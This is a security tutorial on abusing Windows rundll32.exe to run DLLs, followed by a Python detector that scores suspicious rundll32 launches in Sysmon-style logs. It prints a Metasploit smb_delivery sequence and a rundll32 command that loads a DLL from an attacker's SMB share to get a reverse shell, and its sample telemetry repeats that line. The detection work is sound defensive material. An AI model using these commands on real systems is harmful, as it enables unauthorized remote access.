Rundll32.exe Attack
A Rundll32.exe attack abuses the legitimate Windows utility rundll32.exe to execute malicious Dynamic Link Libraries (DLLs). Rundll32.exe is a signed Windows system binary that lets programs invoke exported functions from DLL files, which makes it an attractive tool for attackers: malicious code runs inside a process that looks like ordinary system activity.
Attackers leverage rundll32.exe because it can load and execute code from any DLL it is pointed at, and security tools often trust this legitimate Windows process. The technique is commonly used in penetration testing and in malware campaigns to bypass security controls and establish remote access to target systems.
How Rundll32.exe Attacks Work
The attack process involves creating a malicious DLL file and using rundll32.exe to execute it on the target system. The malicious DLL typically contains a payload that establishes a reverse shell or downloads additional malware. Since rundll32.exe is a trusted Windows process, many security solutions may not flag its execution as suspicious.
Launch Rundll32 Attack via SMB
The SMB Delivery module in Metasploit generates malicious DLL files and serves them via an SMB server. This module provides commands to retrieve and execute payloads remotely, making it effective for penetration testing scenarios.
Generate DLL Payload
To create and serve a malicious DLL payload using Metasploit, load the module, point it at the attacker's listening address, and run it:

```
use exploit/windows/smb/smb_delivery
set srvhost 192.168.1.109
exploit
```
Once the SMB server is running and hosting the malicious DLL, execute the following command on the target Windows machine to trigger the payload:
```
rundll32.exe \\192.168.1.109\vabFG\test.dll,0
```
This command instructs rundll32.exe to load the DLL from the attacker's SMB share and execute the function at ordinal position 0. Upon successful execution, the attacker will receive a reverse shell connection from the victim machine.
Key Attack Characteristics
| Aspect | Description |
|---|---|
| Stealth | Uses a legitimate, signed Windows process to avoid detection |
| Delivery Method | SMB shares, web downloads, or local file placement |
| Payload Types | Reverse shells, credential stealers, persistence mechanisms |
| Detection Difficulty | High, due to legitimate process usage |
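The invocation pattern described above (a DLL pulled from a remote SMB share and run through rundll32.exe) and the "Detection Difficulty" row of the table both come down to the same defensive question: what does a hostile rundll32 launch look like in process-creation telemetry? The following detection logic is an added example, not code from the original article or from Metasploit. It assumes events shaped like Sysmon Event ID 1 fields (Image, CommandLine, ParentImage); the sample events, the list of suspicious parent processes and the scoring weights are constructed for illustration and would be tuned to a real environment.

```python
"""Flag suspicious rundll32.exe launches in process-creation telemetry.

Added example: not the article's or Metasploit's code. Events are dicts with
Sysmon Event ID 1 style fields (Image, CommandLine, ParentImage). All sample
data below is constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Parents that rarely have a legitimate reason to spawn rundll32 (assumed list).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}

# Directories Windows itself loads rundll32 targets from.
SYSTEM_PREFIXES = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

ALERT_THRESHOLD = 5  # assumed: sum of reason weights needed to raise an alert

_FIRST_TOKEN = re.compile(r'^\s*(?:"([^"]*)"|(\S+))\s*(.*)$', re.S)


def split_first_token(cmd: str) -> Tuple[str, str]:
    """Return (first token without surrounding quotes, rest of the command line)."""
    m = _FIRST_TOKEN.match(cmd)
    if not m:
        return "", ""
    token = m.group(1) if m.group(1) is not None else m.group(2)
    return token, m.group(3)


def parse_rundll32_target(cmdline: str) -> Tuple[str, str]:
    """Extract (dll_path, entry_point) from 'rundll32.exe <dll>,<entry> [args]'.

    rundll32 separates the DLL from its entry point with a comma and tolerates
    whitespace after it, so 'x.dll,Entry' and 'x.dll, Entry' both parse.
    """
    _, rest = split_first_token(cmdline)   # drop the rundll32.exe token itself
    spec, rest = split_first_token(rest)   # '<dll>,<entry>' or '<dll>,'
    dll, sep, entry = spec.partition(",")
    if sep and not entry:                  # comma, whitespace, then the entry
        entry, _ = split_first_token(rest)
    return dll, entry


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    command_line: str
    reasons: List[str]
    score: int


def assess_event(event: dict) -> Optional[Finding]:
    """Score one process-creation event; None if it is not a rundll32 launch."""
    if basename(event.get("Image", "")) != "rundll32.exe":
        return None
    cmd = event.get("CommandLine", "")
    dll, entry = parse_rundll32_target(cmd)
    dll_l = dll.lower()
    reasons: List[Tuple[str, int]] = []

    # UNC path: the DLL is fetched over SMB from another host, which is the
    # delivery method in the article and almost never legitimate for rundll32.
    if dll_l.startswith("\\\\"):
        reasons.append(("dll loaded from UNC/SMB path", 5))
    # Absolute path outside the system directories (user profile, temp, downloads).
    elif re.match(r"^[a-z]:\\", dll_l) and not dll_l.startswith(SYSTEM_PREFIXES):
        reasons.append(("dll outside system directories", 3))

    # Entry point given as a bare number or #ordinal rather than a named export.
    if re.fullmatch(r"#?\d+", entry or ""):
        reasons.append(("ordinal/numeric entry point", 2))

    # A full path whose file does not end in .dll (payload renamed to hide it).
    if dll and "\\" in dll and not dll_l.endswith(".dll"):
        reasons.append(("target file lacks .dll extension", 3))

    # Launched by an Office application or script host.
    if basename(event.get("ParentImage", "")) in SUSPICIOUS_PARENTS:
        reasons.append(("spawned by Office/script-host parent", 3))

    return Finding(cmd, [r for r, _ in reasons], sum(w for _, w in reasons))


def scan(events: List[dict]) -> List[Finding]:
    """Return findings at or above ALERT_THRESHOLD, highest score first."""
    hits = [f for f in map(assess_event, events) if f and f.score >= ALERT_THRESHOLD]
    return sorted(hits, key=lambda f: f.score, reverse=True)


# Constructed sample telemetry (not real logs). The first record mirrors the
# article's SMB-delivery command line; the others are benign or other variants.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe \\192.168.1.109\vabFG\test.dll,0",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\update.dll,DllRegisterServer",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL hotplug.dll",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" C:\Users\bob\Downloads\invoice.png,#1',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe printui.dll,PrintUIEntry /in /n \\server\printer",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.score}] {f.command_line}\n    " + "; ".join(f.reasons))
```

Running the block prints three alerts: the renamed `.png` payload (score 8), the article's UNC-share launch (7) and the Word-spawned DLL from a temp directory (6); the `shell32.dll` and `printui.dll` launches score 0, and the UNC printer path in the `printui.dll` arguments is correctly ignored because only the DLL operand is inspected. The UNC check carries the highest weight on its own because rundll32 resolving a DLL over SMB is the single strongest signal this page describes; the other reasons are corroborating context rather than proof.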
Conclusion
Rundll32.exe attacks exploit the legitimate Windows utility to execute malicious DLL files while evading security detection. This technique demonstrates how attackers can abuse trusted system processes to deliver payloads and establish unauthorized access to target systems.
